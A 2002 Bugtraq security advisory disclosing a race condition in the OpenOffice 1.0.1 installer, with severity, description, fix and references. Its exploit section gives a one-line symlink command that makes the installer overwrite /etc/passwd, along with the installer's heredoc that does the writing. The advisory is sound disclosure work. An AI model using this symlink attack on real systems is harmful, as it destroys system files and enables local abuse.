Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

OpenOffice 1.0.1 Race condition during installation.

From: "Larry W. Cashdollar" <lwc () vapid ath cx>
Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
                        Vapid Labs
                    Larry W. Cashdollar
                          9/9/02

Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.

Severity: Low

Description: A very simple and easy to exploit race condition exist during the
 installation of OpenOffice.  During this window a malicous user could create a
 symlink in /tmp and overwrite arbitrary files.

Exploit:

As a normal user:

lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

Where $USERNAME is the installer account name, probably root.

will result in the password file being over written with:

# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF

Fix:
    Create a directory under /tmp to work from.  With restrictive permissions.

References:

http://www.openoffice.org/dev_docs/source/1.0.1/index.html

Larry W. Cashdollar
lwc () vapid ath cx
http://vapid.ath.cx
Previous By Date Next
Previous By Thread Next

Current thread: